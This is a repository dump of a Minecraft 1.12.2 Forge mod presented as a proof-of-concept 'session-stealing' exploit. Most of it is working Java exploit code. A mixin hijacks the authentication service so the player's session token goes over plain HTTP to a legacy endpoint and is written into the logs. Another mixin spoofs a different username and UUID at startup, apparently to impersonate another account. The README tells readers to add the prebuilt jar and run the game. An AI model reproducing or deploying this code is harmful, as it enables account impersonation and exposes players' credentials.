├── LICENSE ├── README.md ├── build.gradle ├── gradle └── wrapper │ ├── gradle-wrapper.jar │ └── gradle-wrapper.properties ├── gradlew ├── gradlew.bat ├── session-token-exploit-1.0-SNAPSHOT-all.jar ├── settings.gradle └── src ├── main ├── java │ └── net │ │ └── jan │ │ └── ste │ │ └── core │ │ ├── EpicAuthenticationService.java │ │ ├── HttpClient.java │ │ ├── SessionTokenExploit.java │ │ ├── SessionTokenExploitCore.java │ │ ├── YggdrasilMinecraftSessionServicePlug.java │ │ └── mixin │ │ ├── MinecraftMixin.java │ │ └── YggdrasilAuthenticationServiceMixin.java └── resources │ └── mixins.ste.json └── xstart └── java └── net └── jan └── xstart └── XStartGradleMain.java /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 ItsYoungDaddy 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Forge mod Session-stealing-exploit 2 | I take no credit for this, all credit goes to Janrupf#6659 on discord or https://github.com/Janrupf. He created this as a proof of concept after I had commented on the MultiMC discord warning people of the exploit. This is designed to be just a proof of concept so a gui is not available 3 | Mod is for version 1.12.2 4 | Add the jar into your folder and run game. 5 | -------------------------------------------------------------------------------- /build.gradle: -------------------------------------------------------------------------------- 1 | buildscript { 2 | repositories { 3 | maven { 4 | name "forge" 5 | url "https://files.minecraftforge.net/maven" 6 | } 7 | 8 | maven { 9 | name "sponge" 10 | url "https://repo.spongepowered.org/maven" 11 | } 12 | } 13 | 14 | dependencies { 15 | classpath group: "net.minecraftforge.gradle", name: "ForgeGradle", version: "2.3-SNAPSHOT" 16 | classpath group: "org.spongepowered", name: "mixingradle", version: "0.6-SNAPSHOT" 17 | } 18 | } 19 | 20 | plugins { 21 | id 'java-library' 22 | id 'com.github.johnrengelman.shadow' version '2.0.4' 23 | } 24 | apply plugin: "net.minecraftforge.gradle.forge" 25 | apply plugin: "org.spongepowered.mixin" 26 | 27 | group 'net.jan' 28 | version '1.0-SNAPSHOT' 29 | 30 | sourceCompatibility = 1.8 31 | 32 | repositories { 33 | mavenCentral() 34 | 35 | maven { 36 | name "sponge" 37 | url "https://repo.spongepowered.org/maven" 38 | } 39 | } 40 | 41 | sourceSets { 42 | main {} 43 | xstart {} 44 | } 45 | 46 | configurations { 47 | shadow 48 | compile.extendsFrom shadow 49 | } 50 | 51 | dependencies { 52 | shadow(group: "org.spongepowered", name: "mixin", version: "0.7.8-SNAPSHOT") { 53 | transitive = false 54 | } 55 | } 56 | 57 | minecraft { 58 | version = "1.12.2-14.23.5.2847" 59 | mappings = "snapshot_20180814" 60 | runDir = "run" 61 | } 62 | 63 | mixin { 64 | add sourceSets.main, "mixins.ste.refmap.json" 65 | } 66 | 67 | runClient { 68 | jvmArgs "-Xmx4G", 69 | "-Dfml.coreMods.load=net.jan.ste.core.SessionTokenExploitCore" 70 | 71 | classpath += sourceSets.xstart.runtimeClasspath 72 | main = "net.jan.xstart.XStartGradleMain" 73 | 74 | if(System.env.MCUSER != null) { 75 | args += "--username" 76 | args += System.env.MCUSER 77 | } 78 | 79 | if(System.env.MCPASS != null) { 80 | args += "--password" 81 | args += System.env.MCPASS 82 | } 83 | 84 | outputs.upToDateWhen {false} 85 | } 86 | 87 | jar { 88 | manifest { 89 | attributes( 90 | "TweakClass": "org.spongepowered.asm.launch.MixinTweaker", 91 | "TweakOrder": 0, 92 | "MixinConfigs": "mixins.ste.json", 93 | "FMLCorePlugin": "net.jan.ste.core.SessionTokenExploitCore" 94 | ) 95 | } 96 | } 97 | 98 | shadowJar { 99 | configurations = [project.configurations.shadow] 100 | } 101 | 102 | reobf { 103 | shadowJar {} 104 | } -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ItsYoungDaddy/Session-stealing-exploit/884d55eb17262c0ae18082085fb2eecba497e75d/gradle/wrapper/gradle-wrapper.jar -------------------------------------------------------------------------------- /gradle/wrapper/gradle-wrapper.properties: -------------------------------------------------------------------------------- 1 | distributionBase=GRADLE_USER_HOME 2 | distributionPath=wrapper/dists 3 | distributionUrl=https\://services.gradle.org/distributions/gradle-4.10.3-all.zip 4 | zipStoreBase=GRADLE_USER_HOME 5 | zipStorePath=wrapper/dists 6 | -------------------------------------------------------------------------------- /gradlew: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env sh 2 | 3 | ############################################################################## 4 | ## 5 | ## Gradle start up script for UN*X 6 | ## 7 | ############################################################################## 8 | 9 | # Attempt to set APP_HOME 10 | # Resolve links: $0 may be a link 11 | PRG="$0" 12 | # Need this for relative symlinks. 13 | while [ -h "$PRG" ] ; do 14 | ls=`ls -ld "$PRG"` 15 | link=`expr "$ls" : '.*-> \(.*\)$'` 16 | if expr "$link" : '/.*' > /dev/null; then 17 | PRG="$link" 18 | else 19 | PRG=`dirname "$PRG"`"/$link" 20 | fi 21 | done 22 | SAVED="`pwd`" 23 | cd "`dirname \"$PRG\"`/" >/dev/null 24 | APP_HOME="`pwd -P`" 25 | cd "$SAVED" >/dev/null 26 | 27 | APP_NAME="Gradle" 28 | APP_BASE_NAME=`basename "$0"` 29 | 30 | # Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 31 | DEFAULT_JVM_OPTS='"-Xmx64m"' 32 | 33 | # Use the maximum available, or set MAX_FD != -1 to use that value. 34 | MAX_FD="maximum" 35 | 36 | warn () { 37 | echo "$*" 38 | } 39 | 40 | die () { 41 | echo 42 | echo "$*" 43 | echo 44 | exit 1 45 | } 46 | 47 | # OS specific support (must be 'true' or 'false'). 48 | cygwin=false 49 | msys=false 50 | darwin=false 51 | nonstop=false 52 | case "`uname`" in 53 | CYGWIN* ) 54 | cygwin=true 55 | ;; 56 | Darwin* ) 57 | darwin=true 58 | ;; 59 | MINGW* ) 60 | msys=true 61 | ;; 62 | NONSTOP* ) 63 | nonstop=true 64 | ;; 65 | esac 66 | 67 | CLASSPATH=$APP_HOME/gradle/wrapper/gradle-wrapper.jar 68 | 69 | # Determine the Java command to use to start the JVM. 70 | if [ -n "$JAVA_HOME" ] ; then 71 | if [ -x "$JAVA_HOME/jre/sh/java" ] ; then 72 | # IBM's JDK on AIX uses strange locations for the executables 73 | JAVACMD="$JAVA_HOME/jre/sh/java" 74 | else 75 | JAVACMD="$JAVA_HOME/bin/java" 76 | fi 77 | if [ ! -x "$JAVACMD" ] ; then 78 | die "ERROR: JAVA_HOME is set to an invalid directory: $JAVA_HOME 79 | 80 | Please set the JAVA_HOME variable in your environment to match the 81 | location of your Java installation." 82 | fi 83 | else 84 | JAVACMD="java" 85 | which java >/dev/null 2>&1 || die "ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 86 | 87 | Please set the JAVA_HOME variable in your environment to match the 88 | location of your Java installation." 89 | fi 90 | 91 | # Increase the maximum file descriptors if we can. 92 | if [ "$cygwin" = "false" -a "$darwin" = "false" -a "$nonstop" = "false" ] ; then 93 | MAX_FD_LIMIT=`ulimit -H -n` 94 | if [ $? -eq 0 ] ; then 95 | if [ "$MAX_FD" = "maximum" -o "$MAX_FD" = "max" ] ; then 96 | MAX_FD="$MAX_FD_LIMIT" 97 | fi 98 | ulimit -n $MAX_FD 99 | if [ $? -ne 0 ] ; then 100 | warn "Could not set maximum file descriptor limit: $MAX_FD" 101 | fi 102 | else 103 | warn "Could not query maximum file descriptor limit: $MAX_FD_LIMIT" 104 | fi 105 | fi 106 | 107 | # For Darwin, add options to specify how the application appears in the dock 108 | if $darwin; then 109 | GRADLE_OPTS="$GRADLE_OPTS \"-Xdock:name=$APP_NAME\" \"-Xdock:icon=$APP_HOME/media/gradle.icns\"" 110 | fi 111 | 112 | # For Cygwin, switch paths to Windows format before running java 113 | if $cygwin ; then 114 | APP_HOME=`cygpath --path --mixed "$APP_HOME"` 115 | CLASSPATH=`cygpath --path --mixed "$CLASSPATH"` 116 | JAVACMD=`cygpath --unix "$JAVACMD"` 117 | 118 | # We build the pattern for arguments to be converted via cygpath 119 | ROOTDIRSRAW=`find -L / -maxdepth 1 -mindepth 1 -type d 2>/dev/null` 120 | SEP="" 121 | for dir in $ROOTDIRSRAW ; do 122 | ROOTDIRS="$ROOTDIRS$SEP$dir" 123 | SEP="|" 124 | done 125 | OURCYGPATTERN="(^($ROOTDIRS))" 126 | # Add a user-defined pattern to the cygpath arguments 127 | if [ "$GRADLE_CYGPATTERN" != "" ] ; then 128 | OURCYGPATTERN="$OURCYGPATTERN|($GRADLE_CYGPATTERN)" 129 | fi 130 | # Now convert the arguments - kludge to limit ourselves to /bin/sh 131 | i=0 132 | for arg in "$@" ; do 133 | CHECK=`echo "$arg"|egrep -c "$OURCYGPATTERN" -` 134 | CHECK2=`echo "$arg"|egrep -c "^-"` ### Determine if an option 135 | 136 | if [ $CHECK -ne 0 ] && [ $CHECK2 -eq 0 ] ; then ### Added a condition 137 | eval `echo args$i`=`cygpath --path --ignore --mixed "$arg"` 138 | else 139 | eval `echo args$i`="\"$arg\"" 140 | fi 141 | i=$((i+1)) 142 | done 143 | case $i in 144 | (0) set -- ;; 145 | (1) set -- "$args0" ;; 146 | (2) set -- "$args0" "$args1" ;; 147 | (3) set -- "$args0" "$args1" "$args2" ;; 148 | (4) set -- "$args0" "$args1" "$args2" "$args3" ;; 149 | (5) set -- "$args0" "$args1" "$args2" "$args3" "$args4" ;; 150 | (6) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" ;; 151 | (7) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" ;; 152 | (8) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" ;; 153 | (9) set -- "$args0" "$args1" "$args2" "$args3" "$args4" "$args5" "$args6" "$args7" "$args8" ;; 154 | esac 155 | fi 156 | 157 | # Escape application args 158 | save () { 159 | for i do printf %s\\n "$i" | sed "s/'/'\\\\''/g;1s/^/'/;\$s/\$/' \\\\/" ; done 160 | echo " " 161 | } 162 | APP_ARGS=$(save "$@") 163 | 164 | # Collect all arguments for the java command, following the shell quoting and substitution rules 165 | eval set -- $DEFAULT_JVM_OPTS $JAVA_OPTS $GRADLE_OPTS "\"-Dorg.gradle.appname=$APP_BASE_NAME\"" -classpath "\"$CLASSPATH\"" org.gradle.wrapper.GradleWrapperMain "$APP_ARGS" 166 | 167 | # by default we should be in the correct project dir, but when run from Finder on Mac, the cwd is wrong 168 | if [ "$(uname)" = "Darwin" ] && [ "$HOME" = "$PWD" ]; then 169 | cd "$(dirname "$0")" 170 | fi 171 | 172 | exec "$JAVACMD" "$@" 173 | -------------------------------------------------------------------------------- /gradlew.bat: -------------------------------------------------------------------------------- 1 | @if "%DEBUG%" == "" @echo off 2 | @rem ########################################################################## 3 | @rem 4 | @rem Gradle startup script for Windows 5 | @rem 6 | @rem ########################################################################## 7 | 8 | @rem Set local scope for the variables with windows NT shell 9 | if "%OS%"=="Windows_NT" setlocal 10 | 11 | set DIRNAME=%~dp0 12 | if "%DIRNAME%" == "" set DIRNAME=. 13 | set APP_BASE_NAME=%~n0 14 | set APP_HOME=%DIRNAME% 15 | 16 | @rem Add default JVM options here. You can also use JAVA_OPTS and GRADLE_OPTS to pass JVM options to this script. 17 | set DEFAULT_JVM_OPTS="-Xmx64m" 18 | 19 | @rem Find java.exe 20 | if defined JAVA_HOME goto findJavaFromJavaHome 21 | 22 | set JAVA_EXE=java.exe 23 | %JAVA_EXE% -version >NUL 2>&1 24 | if "%ERRORLEVEL%" == "0" goto init 25 | 26 | echo. 27 | echo ERROR: JAVA_HOME is not set and no 'java' command could be found in your PATH. 28 | echo. 29 | echo Please set the JAVA_HOME variable in your environment to match the 30 | echo location of your Java installation. 31 | 32 | goto fail 33 | 34 | :findJavaFromJavaHome 35 | set JAVA_HOME=%JAVA_HOME:"=% 36 | set JAVA_EXE=%JAVA_HOME%/bin/java.exe 37 | 38 | if exist "%JAVA_EXE%" goto init 39 | 40 | echo. 41 | echo ERROR: JAVA_HOME is set to an invalid directory: %JAVA_HOME% 42 | echo. 43 | echo Please set the JAVA_HOME variable in your environment to match the 44 | echo location of your Java installation. 45 | 46 | goto fail 47 | 48 | :init 49 | @rem Get command-line arguments, handling Windows variants 50 | 51 | if not "%OS%" == "Windows_NT" goto win9xME_args 52 | 53 | :win9xME_args 54 | @rem Slurp the command line arguments. 55 | set CMD_LINE_ARGS= 56 | set _SKIP=2 57 | 58 | :win9xME_args_slurp 59 | if "x%~1" == "x" goto execute 60 | 61 | set CMD_LINE_ARGS=%* 62 | 63 | :execute 64 | @rem Setup the command line 65 | 66 | set CLASSPATH=%APP_HOME%\gradle\wrapper\gradle-wrapper.jar 67 | 68 | @rem Execute Gradle 69 | "%JAVA_EXE%" %DEFAULT_JVM_OPTS% %JAVA_OPTS% %GRADLE_OPTS% "-Dorg.gradle.appname=%APP_BASE_NAME%" -classpath "%CLASSPATH%" org.gradle.wrapper.GradleWrapperMain %CMD_LINE_ARGS% 70 | 71 | :end 72 | @rem End local scope for the variables with windows NT shell 73 | if "%ERRORLEVEL%"=="0" goto mainEnd 74 | 75 | :fail 76 | rem Set variable GRADLE_EXIT_CONSOLE if you need the _script_ return code instead of 77 | rem the _cmd.exe /c_ return code! 78 | if not "" == "%GRADLE_EXIT_CONSOLE%" exit 1 79 | exit /b 1 80 | 81 | :mainEnd 82 | if "%OS%"=="Windows_NT" endlocal 83 | 84 | :omega 85 | -------------------------------------------------------------------------------- /session-token-exploit-1.0-SNAPSHOT-all.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ItsYoungDaddy/Session-stealing-exploit/884d55eb17262c0ae18082085fb2eecba497e75d/session-token-exploit-1.0-SNAPSHOT-all.jar -------------------------------------------------------------------------------- /settings.gradle: -------------------------------------------------------------------------------- 1 | rootProject.name = 'session-token-exploit' 2 | 3 | -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/EpicAuthenticationService.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core; 2 | 3 | import com.mojang.authlib.GameProfile; 4 | import com.mojang.authlib.exceptions.AuthenticationException; 5 | import com.mojang.authlib.exceptions.AuthenticationUnavailableException; 6 | import com.mojang.authlib.minecraft.MinecraftProfileTexture; 7 | import com.mojang.authlib.minecraft.MinecraftSessionService; 8 | import java.io.IOException; 9 | import java.net.InetAddress; 10 | import java.util.Map; 11 | import org.apache.http.client.methods.CloseableHttpResponse; 12 | import org.apache.http.client.methods.HttpGet; 13 | import org.apache.http.util.EntityUtils; 14 | import org.apache.logging.log4j.LogManager; 15 | import org.apache.logging.log4j.Logger; 16 | 17 | public class EpicAuthenticationService implements MinecraftSessionService { 18 | 19 | private static final Logger log = LogManager.getLogger(EpicAuthenticationService.class); 20 | 21 | private final MinecraftSessionService wrapped; 22 | 23 | public EpicAuthenticationService(MinecraftSessionService wrapped) { 24 | this.wrapped = wrapped; 25 | } 26 | 27 | @Override 28 | public void joinServer(GameProfile profile, String authenticationToken, String serverId) 29 | throws AuthenticationException { 30 | 31 | String authUrl = 32 | String.format( 33 | "http://session.minecraft.net/game/joinserver.jsp?user=%s&sessionId=%s&serverId=%s", 34 | profile.getName(), authenticationToken, serverId); 35 | 36 | log.info(String.format("trying %s", authUrl)); 37 | try (CloseableHttpResponse response = 38 | HttpClient.getInstance().getClosableHttpClient().execute(new HttpGet(authUrl))) { 39 | String responseStr = EntityUtils.toString(response.getEntity()); 40 | 41 | if (!responseStr.equalsIgnoreCase("OK")) { 42 | throw new AuthenticationException( 43 | String.format("Failed to authenticate: %s", responseStr)); 44 | } 45 | } catch (IOException e) { 46 | throw new AuthenticationUnavailableException("Cannot contact authentication server", e); 47 | } 48 | } 49 | 50 | @Override 51 | public GameProfile hasJoinedServer(GameProfile user, String serverId, InetAddress address) 52 | throws AuthenticationUnavailableException { 53 | return this.wrapped.hasJoinedServer(user, serverId, address); 54 | } 55 | 56 | @Override 57 | public Map getTextures( 58 | GameProfile profile, boolean requireSecure) { 59 | return this.wrapped.getTextures(profile, requireSecure); 60 | } 61 | 62 | @Override 63 | public GameProfile fillProfileProperties(GameProfile profile, boolean requireSecure) { 64 | return wrapped.fillProfileProperties(profile, requireSecure); 65 | } 66 | } -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/HttpClient.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core; 2 | 3 | import org.apache.http.client.config.RequestConfig; 4 | import org.apache.http.impl.client.CloseableHttpClient; 5 | import org.apache.http.impl.client.HttpClientBuilder; 6 | 7 | public class HttpClient { 8 | private static final HttpClient instance = new HttpClient(); 9 | 10 | private final CloseableHttpClient closableHttpClient; 11 | 12 | private HttpClient() { 13 | RequestConfig req = 14 | RequestConfig.custom() 15 | .setConnectTimeout(30 * 1000) 16 | .setConnectionRequestTimeout(30 * 1000) 17 | .build(); 18 | 19 | this.closableHttpClient = HttpClientBuilder.create().setDefaultRequestConfig(req).build(); 20 | } 21 | 22 | public CloseableHttpClient getClosableHttpClient() { 23 | return closableHttpClient; 24 | } 25 | 26 | public static HttpClient getInstance() { 27 | return instance; 28 | } 29 | } -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/SessionTokenExploit.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core; 2 | 3 | import net.minecraft.client.Minecraft; 4 | import net.minecraft.util.Session; 5 | 6 | import java.lang.reflect.Field; 7 | import java.util.Arrays; 8 | import java.util.UUID; 9 | 10 | public class SessionTokenExploit { 11 | public static void setNewSession() { 12 | 13 | try { 14 | Field session = Arrays.stream(Minecraft.class.getDeclaredFields()).filter(f -> f.getType() == Session.class).findFirst().get(); 15 | session.setAccessible(true); 16 | session.set(Minecraft.getMinecraft(), new Session( 17 | "UsernameToSpoof", 18 | getIdFromString("UUID-of-user-to-spoof").toString(), 19 | Minecraft.getMinecraft().getSession().getToken(), 20 | "mojang" 21 | )); 22 | } catch(Throwable t) { 23 | throw new RuntimeException(t); 24 | } 25 | } 26 | 27 | private static UUID getIdFromString(String uuid) { 28 | if (uuid.contains("-")) { 29 | return UUID.fromString(uuid); 30 | } else { 31 | return UUID.fromString( 32 | uuid.replaceFirst( 33 | "(\\p{XDigit}{8})(\\p{XDigit}{4})(\\p{XDigit}{4})(\\p{XDigit}{4})(\\p{XDigit}+)", 34 | "$1-$2-$3-$4-$5")); 35 | } 36 | } 37 | } 38 | -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/SessionTokenExploitCore.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core; 2 | 3 | import net.minecraftforge.fml.relauncher.IFMLLoadingPlugin; 4 | import org.spongepowered.asm.launch.MixinBootstrap; 5 | import org.spongepowered.asm.mixin.Mixins; 6 | 7 | import javax.annotation.Nullable; 8 | import java.util.Map; 9 | 10 | public class SessionTokenExploitCore implements IFMLLoadingPlugin { 11 | public SessionTokenExploitCore() { 12 | MixinBootstrap.init(); 13 | Mixins.addConfiguration("mixins.ste.json"); 14 | } 15 | 16 | @Override 17 | public String[] getASMTransformerClass() { 18 | return new String[0]; 19 | } 20 | 21 | @Override 22 | public String getModContainerClass() { 23 | return null; 24 | } 25 | 26 | @Nullable 27 | @Override 28 | public String getSetupClass() { 29 | return null; 30 | } 31 | 32 | @Override 33 | public void injectData(Map data) { 34 | 35 | } 36 | 37 | @Override 38 | public String getAccessTransformerClass() { 39 | return null; 40 | } 41 | } 42 | -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/YggdrasilMinecraftSessionServicePlug.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core; 2 | 3 | import com.mojang.authlib.yggdrasil.YggdrasilAuthenticationService; 4 | import com.mojang.authlib.yggdrasil.YggdrasilMinecraftSessionService; 5 | 6 | public class YggdrasilMinecraftSessionServicePlug extends YggdrasilMinecraftSessionService { 7 | public YggdrasilMinecraftSessionServicePlug(YggdrasilAuthenticationService authenticationService) { 8 | super(authenticationService); 9 | } 10 | } 11 | -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/mixin/MinecraftMixin.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core.mixin; 2 | 3 | import net.jan.ste.core.SessionTokenExploit; 4 | import net.minecraft.client.Minecraft; 5 | import net.minecraft.client.main.GameConfiguration; 6 | import org.spongepowered.asm.mixin.*; 7 | import org.spongepowered.asm.mixin.injection.At; 8 | import org.spongepowered.asm.mixin.injection.Inject; 9 | import org.spongepowered.asm.mixin.injection.callback.CallbackInfo; 10 | 11 | @Mixin(Minecraft.class) 12 | public class MinecraftMixin { 13 | @Inject( 14 | method = "", 15 | at = @At(value = "RETURN") 16 | ) 17 | private void activateFakeSession(GameConfiguration gameConfig, CallbackInfo ci) { 18 | SessionTokenExploit.setNewSession(); 19 | } 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/net/jan/ste/core/mixin/YggdrasilAuthenticationServiceMixin.java: -------------------------------------------------------------------------------- 1 | package net.jan.ste.core.mixin; 2 | 3 | import com.mojang.authlib.minecraft.MinecraftSessionService; 4 | import com.mojang.authlib.yggdrasil.YggdrasilAuthenticationService; 5 | import com.mojang.authlib.yggdrasil.YggdrasilMinecraftSessionService; 6 | import net.jan.ste.core.EpicAuthenticationService; 7 | import net.jan.ste.core.YggdrasilMinecraftSessionServicePlug; 8 | import org.spongepowered.asm.mixin.Mixin; 9 | import org.spongepowered.asm.mixin.injection.At; 10 | import org.spongepowered.asm.mixin.injection.Inject; 11 | import org.spongepowered.asm.mixin.injection.callback.CallbackInfoReturnable; 12 | 13 | @Mixin(YggdrasilAuthenticationService.class) 14 | public class YggdrasilAuthenticationServiceMixin { 15 | @Inject( 16 | method = "createMinecraftSessionService", 17 | cancellable = true, 18 | remap = false, 19 | at = @At( 20 | value = "HEAD" 21 | ) 22 | ) 23 | public void createSpoofedSessionService(CallbackInfoReturnable cir) { 24 | cir.setReturnValue(new EpicAuthenticationService( 25 | new YggdrasilMinecraftSessionServicePlug((YggdrasilAuthenticationService) (Object) this))); 26 | cir.cancel(); 27 | } 28 | } 29 | -------------------------------------------------------------------------------- /src/main/resources/mixins.ste.json: -------------------------------------------------------------------------------- 1 | { 2 | "required": true, 3 | "package": "net.jan.ste.core.mixin", 4 | "compatibilityLevel": "JAVA_8", 5 | "target": "@env(DEFAULT)", 6 | "minVersion": "*", 7 | "refmap": "mixins.ste.refmap.json", 8 | "client": [ 9 | "YggdrasilAuthenticationServiceMixin", 10 | "MinecraftMixin" 11 | ], 12 | "injectors": { 13 | "defaultRequire": 1 14 | } 15 | } -------------------------------------------------------------------------------- /src/xstart/java/net/jan/xstart/XStartGradleMain.java: -------------------------------------------------------------------------------- 1 | package net.jan.xstart; 2 | 3 | import java.io.File; 4 | import java.lang.reflect.Field; 5 | import java.lang.reflect.Method; 6 | 7 | public class XStartGradleMain { 8 | public static void main(String[] args) throws Throwable { 9 | Field sysPathsField = ClassLoader.class.getDeclaredField("sys_paths"); 10 | sysPathsField.setAccessible(true); 11 | 12 | Field usrPathsField = ClassLoader.class.getDeclaredField("usr_paths"); 13 | usrPathsField.setAccessible(true); 14 | 15 | String[] originalSysPaths = (String[]) sysPathsField.get(null); 16 | 17 | Class gradleStartClass = Class.forName("GradleStart"); 18 | Class gradleStartCommonClass = Class.forName("net.minecraftforge.gradle.GradleStartCommon"); 19 | 20 | Method hackNativesMethod = gradleStartClass.getDeclaredMethod("hackNatives"); 21 | hackNativesMethod.setAccessible(true); 22 | 23 | hackNativesMethod.invoke(null); 24 | sysPathsField.set(null, originalSysPaths); 25 | 26 | usrPathsField.set(null, System.getProperty("java.library.path").split(File.pathSeparator)); 27 | 28 | Object start = gradleStartClass.newInstance(); 29 | 30 | Method launchMethod = gradleStartCommonClass.getDeclaredMethod("launch", String[].class); 31 | launchMethod.setAccessible(true); 32 | launchMethod.invoke(start, (Object) args); 33 | } 34 | } 35 | --------------------------------------------------------------------------------